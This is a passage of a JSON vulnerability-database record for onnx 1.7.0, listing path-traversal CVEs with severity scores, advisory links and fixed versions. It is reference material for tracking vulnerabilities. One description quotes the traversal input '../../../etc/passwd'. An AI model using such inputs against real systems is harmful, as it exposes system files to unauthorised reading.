outside the model current directory or user-provided directory, for example 
\"../../../etc/passwd\"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25882","reference_id":"","reference_type":"","scores":[{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.9071","published_at":"2026-06-06T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90722","published_at":"2026-06-09T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90706","published_at":"2026-06-08T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90708","published_at":"2026-06-07T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90698","published_at":"2026-06-04T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90711","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25882"},{"reference_url":"https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring
_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129"},{"reference_url":"https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d"},{"reference_url":"https://github.com/onnx/onnx/issues/3991","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H
/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/issues/3991"},{"reference_url":"https://github.com/onnx/onnx/pull/4400","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/pull/4400"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml"},{"reference_url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7",
"scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25882","reference_id":"CVE-2022-25882","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25882"},{"reference_url":"https://github.com/advisories/GHSA-ffxj-547x-5j7c","reference_id":"GHSA-ffxj-547x-5j7c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffxj-547x-5j7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31236?format=json","purl":"pkg:pypi/onnx@1.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2p7h-ajfk-uugy"},{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-mz2c-nefk-8ffx"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.13.0"}],"aliases":["CVE-2022-25882","GHSA-ffxj-547x-5j7c","PYSEC-2023-38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vv5a-
aqzk-kker"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63876?format=json","vulnerability_id":"VCID-zxt4-rysw-hbf3","summary":"onnx: ONNX: Information Disclosure via Path Traversal Vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27489","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09568","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09569","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09996","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09962","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27489"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27489","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27489"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","reference_id":"","reference_type":"","scores":[{"value":"8.7","sc
oring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/"}],"url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27489","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27489"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190","reference_id":"1133190","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453929","reference_id":"2453929","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453929"},{"reference_url":"https://github.com/advisories/GHSA-3r9x-f23j-gc73","reference_id":"GHSA-3r9x-f23j-gc73","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisor
ies/GHSA-3r9x-f23j-gc73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-27489","GHSA-3r9x-f23j-gc73"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zxt4-rysw-hbf3"}],"fixing_vulnerabilities":[],"risk_score":"4.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.7.0"}